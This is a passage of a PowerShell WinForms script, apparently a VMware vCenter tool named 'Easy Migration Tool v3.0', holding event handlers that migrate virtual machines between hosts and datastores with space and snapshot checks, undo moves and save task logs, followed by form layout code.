$SourceButton.Text = 'Source - Select VMs' $DestinationButton.Text = 'Destination Host' $FindVMTxtBox.Enabled = $true $FindVMBtn.Enabled = $true $ResetFindVMBtn.Enabled = $true $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $SourceButton_OnClick= { #TODO: Place custom script here $ClusterName = $ClusterComboBox.SelectedItem If ($SourceButton.Text -eq "Source - Select One Host") { $SourceHostname = $SourceHostListBox.SelectedItem If ($SourceHostname -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Source Host.') } Else { #Get Hostnames in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | Where-Object {$_.Name -notlike "$SourceHostname"} | % { [void]$DestinationListBox.items.add($_.Name) } $SourceHostListBox.Enabled = $false $SourceButton.Enabled = $false $AllClustersCheckbox.Enabled = $true $DestinationListBox.Enabled = $true $DestinationButton.Enabled = $true $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } If ($SourceButton.Text -eq "Source - Select VMs") { $SourceVMname = $SourceVMListBox.SelectedItem If ($SourceVMname -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select One or More VMs.') } Else { if ($DestinationButton.Text -like "Destination Host") { #Get Hostnames in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | % { [void]$DestinationListBox.items.add($_.Name) } } Else { #Get Datastores in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | % { [void]$DestinationListBox.items.add($_.Name) } } $DestinationListBox.Enabled = $true $SourceVMListBox.Enabled = $false $SourceButton.Enabled = $false $AllClustersCheckbox.Enabled = $true $DestinationButton.Enabled = $true $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } If ($SourceButton.Text -like "Source - Select a Datastore") { $SourceDBname = $SourceDBListBox.SelectedItem If ($SourceDBname -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select One Datastore.') } Else { #Get Datastores in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | Where-Object {$_.Name -notlike "$SourceDBname"} | % { [void]$DestinationListBox.items.add($_.Name) } $SourceDBListBox.Enabled = $false $SourceButton.Enabled = $false $DestinationListBox.Enabled = $true $DestinationButton.Enabled = $true $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } } $AllClustersCheckbox_Click= { #TODO: Place custom script here $DestinationListBox.Items.Clear() #List the hosts in all the clusters Get-VMHost | % { [void]$DestinationListBox.items.add($_.Name) } $AllClustersCheckbox.Enabled = $False } $DestinationButton_OnClick= { #TODO: Place custom script here $DestinationName = $DestinationListBox.SelectedItem If ($DestinationName -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Destination.') } Else { $AllClustersCheckbox.Enabled = $False $DestinationListBox.Enabled = $False $DestinationButton.Enabled = $False $MigrateButton.Enabled = $True $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $FindVMBtn_OnClick= { #TODO: Place custom script here If($FindVMTxtBox.Text -ne "") { If($SourceVMListBox.CheckedItems.Count -eq 0) { $SourceVMListBox.Items.Clear() } Else { $CheckedVMs = @() Foreach($VM in $SourceVMListBox.CheckedItems) { $CheckedVMs += $VM } $SourceVMListBox.Items.Clear() Foreach($CheckedVM in $CheckedVMs) { [void]$SourceVMListBox.items.add($CheckedVM) $SourceVMListBox.SetItemChecked($SourceVMListBox.items.IndexOf($CheckedVM),$true) } } $BeforeCount = $SourceVMListBox.Items.Count If($HostToHostButton.BackColor -eq [System.Drawing.Color]::lightblue) { Get-VMHost -Name $SourceHostname | Get-VM -Name $FindVMTxtBox.Text -ErrorAction SilentlyContinue | % { [void]$SourceVMListBox.items.add($_.Name) } } Else { Get-Cluster -Name $ClusterName | Get-VM -Name $FindVMTxtBox.Text -ErrorAction SilentlyContinue | % { [void]$SourceVMListBox.items.add($_.Name) } } } $AfterCount = $SourceVMListBox.Items.Count If($AfterCount -eq $BeforeCount) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('No results found.') } } $ResetFindVMBtn_OnClick= { #TODO: Place custom script here $SourceVMListBox.Items.Clear() $FindVMTxtBox.Text = "" If($HostToHostButton.BackColor -eq [System.Drawing.Color]::lightblue) { Get-VMHost -Name $SourceHostname | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) } } Else { Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) } } } $MigrateButton_OnClick= { #TODO: Place custom script here If ($SourceButton.Text -eq "Source - Select One Host") { $SourceHostname = $SourceHostListBox.SelectedItem $DestinationName = $DestinationListBox.SelectedItem $VMs = Get-VMHost $SourceHostname | Get-VM foreach($VM in $VMs) { Get-VM -Name $VM | Move-VM -Destination (Get-VMHost -Name $DestinationName) -RunAsync -ErrorAction SilentlyContinue If (!$?) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details." [void]$MessagesListBox.items.add($MsgLine) } Else { $d = Get-Date $TaskLine = "$d - $VM migrated successfully from $SourceHostName to $DestinationName" [void]$TaskListBox.items.add($TaskLine) } } $SourceVMListBox.enabled = $true $SourceButton.enabled = $true $MigrateButton.Enabled = $false $AllClustersCheckbox.Checked = $false $DestinationListBox.Items.Clear() $ClearMsgButton.Enabled = $true $UndoButton.Enabled = $true $UndoALLButton.Enabled = $true $SaveTaskButton.Enabled = $true } If ($SourceButton.Text -eq "Source - Select VMs") { $DestinationName = $DestinationListBox.SelectedItem If($DestinationButton.Text -eq "Destination Host") { foreach($VM in $SourceVMListBox.CheckedItems) { $SourceName = Get-VM -Name $VM | Get-VMHost | % {$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Destination (Get-VMHost -Name $DestinationName) -RunAsync -ErrorAction SilentlyContinue If (!$?) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details." [void]$MessagesListBox.items.add($MsgLine) } Else { $d = Get-Date $line = "$d - $VM migrated successfully from $SourceName to $DestinationName." [void]$TaskListBox.items.add($line) } } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same." [void]$MessagesListBox.items.add($MsgLine) } } } Else { foreach($VM in $SourceVMListBox.CheckedItems) { $VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024 $DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB} $DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2} $DBAvailableSpace = $DBFreeSpace - $DBReserved $SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count If ($VMsize -gt $DBAvailableSpace) { $VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024) $DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024) $DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024) $d = Get-Date $MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)." [void]$MessagesListBox.items.add($MsgLine) } ElseIf ($SnapshotCount -gt 0) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots." [void]$MessagesListBox.items.add($MsgLine) } Else { $SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync -ErrorAction SilentlyContinue If (!$?) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details." [void]$MessagesListBox.items.add($MsgLine) } Else { $d = Get-Date $TaskLine = "$d - $VM migrated successfully from $SourceName to $DestinationName" [void]$TaskListBox.items.add($TaskLine) } } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same." [void]$MessagesListBox.items.add($MsgLine) } } } } $SourceVMListBox.enabled = $true $SourceButton.enabled = $true $MigrateButton.Enabled = $false $AllClustersCheckbox.Checked = $false $DestinationListBox.Items.Clear() $ClearMsgButton.Enabled = $true $UndoButton.Enabled = $true $UndoALLButton.Enabled = $true $SaveTaskButton.Enabled = $true } If ($SourceButton.Text -eq "Source - Select a Datastore") { $SourceDBname = $SourceDBListBox.SelectedItem $DestinationName = $DestinationListBox.SelectedItem $VMs = Get-Datastore -Name $SourceDBname | Get-VM If($VMs.count -gt 0) { foreach($VM in $VMs) { $VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024 $DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB} $DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2} $DBAvailableSpace = $DBFreeSpace - $DBReserved $SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count If ($VMsize -gt $DBFreeSpace) { $VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024) $DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024) $DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024) $d = Get-Date $MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)." [void]$MessagesListBox.items.add($MsgLine) } ElseIf ($SnapshotCount -gt 0) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots." [void]$MessagesListBox.items.add($MsgLine) } Else { Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync -ErrorAction SilentlyContinue If (!$?) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details." [void]$MessagesListBox.items.add($MsgLine) } Else { $d = Get-Date $line = "$d - $VM migrated successfully from $SourceDBName to $DestinationName" [void]$TaskListBox.items.add($line) } } } } Else { $d = Get-Date $MsgLine = "$d - No VM is present on the source datastore $SourceDBname." [void]$MessagesListBox.items.add($MsgLine) } $SourceDBListBox.enabled = $true $SourceButton.enabled = $true $AllClustersCheckbox.Checked = $false $DestinationListBox.Items.Clear() $MigrateButton.Enabled = $false $ClearMsgButton.Enabled = $true $UndoButton.Enabled = $true $UndoALLButton.Enabled = $true $SaveTaskButton.Enabled = $true } } $RESETButton_OnClick= { #TODO: Place custom script here $ClusterComboBox.Enabled = $true $HostToHostButton.Enabled = $true $VMToHostButton.Enabled = $true $DBtoDBButton.Enabled = $true $VMtoDBButton.Enabled = $true $SourceHostListBox.Items.Clear() $SourceDBListBox.Items.Clear() $SourceVMListBox.Items.Clear() $SourceButton.Enabled = $false $SourceButton.Text = 'Source' $AllClustersCheckbox.Checked = $false $DestinationListBox.Items.Clear() $DestinationButton.Enabled = $false $DestinationButton.Text = 'Destination' $FindVMTxtBox.Enabled = $false $FindVMTxtBox.Text = "" $FindVMBtn.Enabled = $false $ResetFindVMBtn.Enabled = $false $MigrateButton.Enabled = $false $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Remove($SourceVMListBox) $MigrationForm.Controls.Remove($SourceDBListBox) $MigrationForm.Controls.Add($SourceHostListBox) $HostToHostButton.BackColor = [System.Drawing.Color]::Transparent $VMToHostButton.BackColor = [System.Drawing.Color]::Transparent $DBtoDBButton.BackColor = [System.Drawing.Color]::Transparent $VMtoDBButton.BackColor = [System.Drawing.Color]::Transparent } $ChangeVCButton_OnClick= { #TODO: Place custom script here $VCComboBox.Text = "" $VCComboBox.Enabled = $true $LoginButton.Enabled = $true $ClusterComboBox.Items.Clear() $ClusterComboBox.Enabled = $false $HostToHostButton.Enabled = $false $VMToHostButton.Enabled = $false $DBtoDBButton.Enabled = $false $VMtoDBButton.Enabled = $false $SourceHostListBox.Items.Clear() $SourceDBListBox.Items.Clear() $SourceVMListBox.Items.Clear() $SourceButton.Enabled = $false $SourceButton.Text = 'Source' $AllClustersCheckbox.Checked = $false $DestinationListBox.Items.Clear() $DestinationButton.Enabled = $false $DestinationButton.Text = 'Destination' $MigrateButton.Enabled = $false $ResetButton.Enabled = $false $ChangeVCButton.Enabled = $false $MessagesListBox.Items.Clear() $TaskListBox.Items.Clear() $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Remove($SourceVMListBox) $MigrationForm.Controls.Remove($SourceDBListBox) $MigrationForm.Controls.Add($SourceHostListBox) $HostToHostButton.BackColor = [System.Drawing.Color]::Transparent $VMToHostButton.BackColor = [System.Drawing.Color]::Transparent $DBtoDBButton.BackColor = [System.Drawing.Color]::Transparent $VMtoDBButton.BackColor = [System.Drawing.Color]::Transparent #Disconnect from vCenter server Disconnect-VIServer -Confirm:$false } $CloseButton_OnClick= { #TODO: Place custom script here If ($VCComboBox.Text -ne "") { #Disconnect from vCenter server Disconnect-VIServer -Confirm:$false } #Close Form $MigrationForm.close() } $ClearMsgButton_Click= { #TODO: Place custom script here If($MessagesListBox.items.count -eq 0) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('No messages to clear.') } Else { $MessagesListBox.items.clear() } } $UndoButton_Click= { #TODO: Place custom script here If ($TaskListBox.Items.Count -eq 0) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('The task list is empty.') } Else { If ($TaskListBox.SelectedItems.Count -eq 0) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please select one or more tasks.') } Else { foreach($Task in $TaskListBox.SelectedItems) { $Task = $Task.split(" ") $VM = $Task[3] $DestinationName = $Task[7] $a = $DestinationName.indexof("SAN") If ($a -lt 0) #If Destination is NOT a datastore { #Perform VMotion $SourceName = Get-VM -name $VM | Get-VMHost | %{$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Destination (Get-VMHost $DestinationName) -RunAsync } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same." [void]$MessagesListBox.items.add($MsgLine) } } Else { #Perform SVMotion $VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024 $DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB} $DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2} $DBAvailableSpace = $DBFreeSpace - $DBReserved $SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count If ($VMsize -gt $DBAvailableSpace) { $VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024) $DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024) $DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024) $d = Get-Date $MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)." [void]$MessagesListBox.items.add($MsgLine) } ElseIf ($SnapshotCount -gt 0) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots." [void]$MessagesListBox.items.add($MsgLine) } Else { $SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same." [void]$MessagesListBox.items.add($MsgLine) } } } } While($TaskListBox.SelectedItems.Count -gt 0) { $TaskListBox.Items.Remove($TaskListBox.SelectedItems[0]) } } } } $UndoALLButton_Click= { #TODO: Place custom script here If ($TaskListBox.Items.Count -eq 0) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('The task list is empty.') } Else { foreach($Task in $TaskListBox.Items) { $Task = $Task.split(" ") $VM = $Task[3] $DestinationName = $Task[7] $a = $DestinationName.indexof("SAN") If ($a -lt 0) #If Destination is NOT a datastore { #Perform VMotion $SourceName = Get-VM -name $VM | Get-VMHost | %{$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Destination (Get-VMHost $DestinationName) -RunAsync } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same." [void]$MessagesListBox.items.add($MsgLine) } } Else { #Perform SVMotion $VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024 $DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB} $DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2} $DBAvailableSpace = $DBFreeSpace - $DBReserved $SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count If ($VMsize -gt $DBAvailableSpace) { $VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024) $DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024) $DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024) $d = Get-Date $MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)." [void]$MessagesListBox.items.add($MsgLine) } ElseIf ($SnapshotCount -gt 0) { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots." [void]$MessagesListBox.items.add($MsgLine) } Else { $SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name} If($SourceName -ne $DestinationName) { Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync } Else { $d = Get-Date $MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same." [void]$MessagesListBox.items.add($MsgLine) } } } } $TaskListBox.Items.Clear() } } $SaveTaskButton_Click= { #TODO: Place custom script here If ($TaskListBox.items.count -eq 0) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Nothing to save to log file.') } Else { $SaveFileD = new-object System.Windows.Forms.SaveFileDialog $SaveFileD.Filter = "Log Files (*.log)|*.log"; $SaveFileD.Title = "Save to a log file"; $SaveFileD.FilterIndex = 2; $SaveFileD.RestoreDirectory = $true; if ($SaveFileD.ShowDialog() -eq [System.Windows.Forms.DialogResult]::OK) { $FileName = $SaveFileD.FileName $Tasks = $TaskListBox.items $logheader = "Easy Migration Tool v3.0 - Log generated on " + (Get-Date) #Save a log file for this session to a location selected by the user Out-File -InputObject $logheader -FilePath $Filename Out-File -InputObject "" -Append -FilePath $FileName Out-File -InputObject $Tasks -Append -FilePath $FileName } } } $ReloadTaskButton_Click= { #TODO: Place custom script here $OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog #$OpenFileDialog.initialDirectory = $initialDirectory $OpenFileDialog.filter = "Log Files (*.log)|*.log" if ($OpenFileDialog.ShowDialog() -eq [System.Windows.Forms.DialogResult]::OK) { $FileName = $OpenFileDialog.FileName $LinesCount = (Get-Content $FileName).Count $LogLines = Get-Content $FileName | Select -Last ($LinesCount - 2) $TaskListBox.Items.Clear() foreach ($LogLine in $LogLines) { [void]$TaskListBox.items.add($LogLine) } $ClearMsgButton.Enabled = $true $UndoButton.Enabled = $true $UndoALLButton.Enabled = $true $SaveTaskButton.Enabled = $true } } #---------------------------------------------- #region Generated Form Code # Start Main Form $MigrationForm.Text = 'Easy Migration Tool v3.0' $MigrationForm.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $MigrationForm.Name = 'EasyMigrationForm' $MigrationForm.StartPosition = "CenterScreen" $MigrationForm.FormBorderStyle = "FixedDialog" $MigrationForm.MaximizeBox = $false $MigrationForm.MinimizeBox = $false $MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0 $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 1024 $System_Drawing_Size.Height = 768 $MigrationForm.ClientSize = $System_Drawing_Size # End Main Form #Start Easy_Migration Header $Header.Font = new-object System.Drawing.Font("Tahoma",10,[System.Drawing.FontStyle]::Bold) $Header.TextAlign = [System.Drawing.ContentAlignment]::MiddleLeft $Header.Text = 'Easy Migration Tool v3.0' $Header.Location = new-object System.Drawing.Point(150,15) $Header.Size = new-object System.Drawing.Size(230, 20) $MigrationForm.Controls.Add($Header) #End Easy_Migration Header # Start vCenter Server Label $vCenterLabel.TabIndex = 2 $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 95 $System_Drawing_Size.Height = 20 $vCenterLabel.Size = $System_Drawing_Size $vCenterLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $vCenterLabel.Text = 'vCenter Server:' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 50 $vCenterLabel.Location = $System_Drawing_Point $vCenterLabel.DataBindings.DefaultDataSourceUpdateMode = 0 $vCenterLabel.Name = 'vCenterLabel' $MigrationForm.Controls.Add($vCenterLabel) # End vCenter Server Label # Start vCenter ComboBox $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 120 $System_Drawing_Size.Height = 20 $VCComboBox.Size = $System_Drawing_Size $VCComboBox.Font = new-object System.Drawing.Font("Tahoma",8) $VCComboBox.DataBindings.DefaultDataSourceUpdateMode = 0 $VCComboBox.Name = 'VCComboBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 125 $System_Drawing_Point.Y = 50 $VCComboBox.Location = $System_Drawing_Point $VCComboBox.TabIndex = 0 $VCNames = @('vcserver01','vcserver02') foreach($VCName in $VCNames) { $VCComboBox.Items.add($VCName) } $MigrationForm.Controls.Add($VCComboBox) # End vCenter ComboBox # Start Login Button $LoginButton.TabIndex = 0 $LoginButton.Name = 'LoginButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 80 $System_Drawing_Size.Height = 22 $LoginButton.Size = $System_Drawing_Size $LoginButton.Font = new-object System.Drawing.Font("Tahoma",8) $LoginButton.UseVisualStyleBackColor = $True $LoginButton.Text = 'Login' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 250 $System_Drawing_Point.Y = 50 $LoginButton.Location = $System_Drawing_Point $LoginButton.DataBindings.DefaultDataSourceUpdateMode = 0 $LoginButton.add_Click($LoginButton_Click) $MigrationForm.Controls.Add($LoginButton) # End Login Button # Start Change VC Button $ChangeVCButton.TabIndex = 19 $ChangeVCButton.Name = 'ChangeVCButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 90 $System_Drawing_Size.Height = 22 $ChangeVCButton.Size = $System_Drawing_Size $ChangeVCButton.Font = new-object System.Drawing.Font("Tahoma",8) $ChangeVCButton.UseVisualStyleBackColor = $True $ChangeVCButton.Text = 'Change vCenter' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 335 $System_Drawing_Point.Y = 50 $ChangeVCButton.Location = $System_Drawing_Point $ChangeVCButton.DataBindings.DefaultDataSourceUpdateMode = 0 $ChangeVCButton.add_Click($ChangeVCButton_OnClick) $ChangeVCButton.Enabled = $false $MigrationForm.Controls.Add($ChangeVCButton) # End Change VC Button # Start Cluster Combobox $ClusterLabel.TabIndex = 5 $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 85 $System_Drawing_Size.Height = 20 $ClusterLabel.Size = $System_Drawing_Size $ClusterLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $ClusterLabel.Text = 'Select Cluster:' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 40 $System_Drawing_Point.Y = 90 $ClusterLabel.Location = $System_Drawing_Point $ClusterLabel.DataBindings.DefaultDataSourceUpdateMode = 0 $ClusterLabel.Name = 'ClusterLabel' $MigrationForm.Controls.Add($ClusterLabel) $ClusterComboBox.FormattingEnabled = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 120 $System_Drawing_Size.Height = 100 $ClusterComboBox.Size = $System_Drawing_Size $ClusterComboBox.Font = new-object System.Drawing.Font("Tahoma",8) $ClusterComboBox.DataBindings.DefaultDataSourceUpdateMode = 0 $ClusterComboBox.Name = 'ClusterComboBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 125 $System_Drawing_Point.Y = 90 $ClusterComboBox.Location = $System_Drawing_Point $ClusterComboBox.TabIndex = 5 $ClusterComboBox.Enabled = $False $MigrationForm.Controls.Add($ClusterComboBox) # End Cluster Listbox # Start Host to Host Button $HostToHostButton.TabIndex = 3 $HostToHostButton.Name = 'HostToHostButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 85 $System_Drawing_Size.Height = 20 $HostToHostButton.Size = $System_Drawing_Size $HostToHostButton.Font = new-object System.Drawing.Font("Tahoma",8) $HostToHostButton.UseVisualStyleBackColor = $True $HostToHostButton.Text = 'Host to Host' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 130 $HostToHostButton.Location = $System_Drawing_Point $HostToHostButton.DataBindings.DefaultDataSourceUpdateMode = 0 $HostToHostButton.add_Click($HostToHostButton_Click) $HostToHostButton.Enabled = $False $MigrationForm.Controls.Add($HostToHostButton) # End Host to Host Button # Start VM to Host Button $VMToHostButton.TabIndex = 3 $VMToHostButton.Name = 'VMToHostButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 90 $System_Drawing_Size.Height = 20 $VMToHostButton.Size = $System_Drawing_Size $VMToHostButton.Font = new-object System.Drawing.Font("Tahoma",8) $VMToHostButton.UseVisualStyleBackColor = $True $VMToHostButton.Text = 'VM to Host' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 120 $System_Drawing_Point.Y = 130 $VMToHostButton.Location = $System_Drawing_Point $VMToHostButton.DataBindings.DefaultDataSourceUpdateMode = 0 $VMToHostButton.add_Click($VMToHostButton_Click) $VMToHostButton.Enabled = $false $MigrationForm.Controls.Add($VMToHostButton) # End VM to Host Button # Start Datastore to Datastore Button $DBtoDBButton.TabIndex = 3 $DBtoDBButton.Name = 'DBtoDBButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 130 $System_Drawing_Size.Height = 20 $DBtoDBButton.Size = $System_Drawing_Size $DBtoDBButton.Font = new-object System.Drawing.Font("Tahoma",8) $DBtoDBButton.UseVisualStyleBackColor = $True $DBtoDBButton.Text = 'Datastore to Datastore' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 215 $System_Drawing_Point.Y = 130 $DBtoDBButton.Location = $System_Drawing_Point $DBtoDBButton.DataBindings.DefaultDataSourceUpdateMode = 0 $DBtoDBButton.add_Click($DBtoDBButton_Click) $DBtoDBButton.Enabled = $false $MigrationForm.Controls.Add($DBtoDBButton) # End Datastore to Datastore Button # Start VM to Datastore Button $VMtoDBButton.TabIndex = 3 $VMtoDBButton.Name = 'VMtoDBButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 100 $System_Drawing_Size.Height = 20 $VMtoDBButton.Size = $System_Drawing_Size $VMtoDBButton.Font = new-object System.Drawing.Font("Tahoma",8) $VMtoDBButton.UseVisualStyleBackColor = $True $VMtoDBButton.Text = 'VM to Datastore' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 350 $System_Drawing_Point.Y = 130 $VMtoDBButton.Location = $System_Drawing_Point $VMtoDBButton.DataBindings.DefaultDataSourceUpdateMode = 0 $VMtoDBButton.add_Click($VMtoDBButton_Click) $VMtoDBButton.Enabled = $false $MigrationForm.Controls.Add($VMtoDBButton) # End VM to Datastore Button # Start Source Host List Box $SourceHostListBox.FormattingEnabled = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 415 $SourceHostListBox.Size = $System_Drawing_Size $SourceHostListBox.Font = new-object System.Drawing.Font("Tahoma",8) $SourceHostListBox.DataBindings.DefaultDataSourceUpdateMode = 0 $SourceHostListBox.Name = 'SourceHostListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 180 $SourceHostListBox.Location = $System_Drawing_Point $SourceHostListBox.MultiColumn = $false $SourceHostListBox.TabIndex = 5 $SourceHostListBox.Sorted = $True $SourceHostListBox.HorizontalScrollbar = $true $SourceHostListBox.add_MouseDoubleClick($SourceHostListBox_MouseDoubleClick) $MigrationForm.Controls.Add($SourceHostListBox) # End Source Host List Box # Start Source Datastore List Box $SourceDBListBox.FormattingEnabled = $True $SourceDBListBox.CheckOnClick = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 415 $SourceDBListBox.Size = $System_Drawing_Size $SourceDBListBox.Font = new-object System.Drawing.Font("Tahoma",8) $SourceDBListBox.DataBindings.DefaultDataSourceUpdateMode = 0 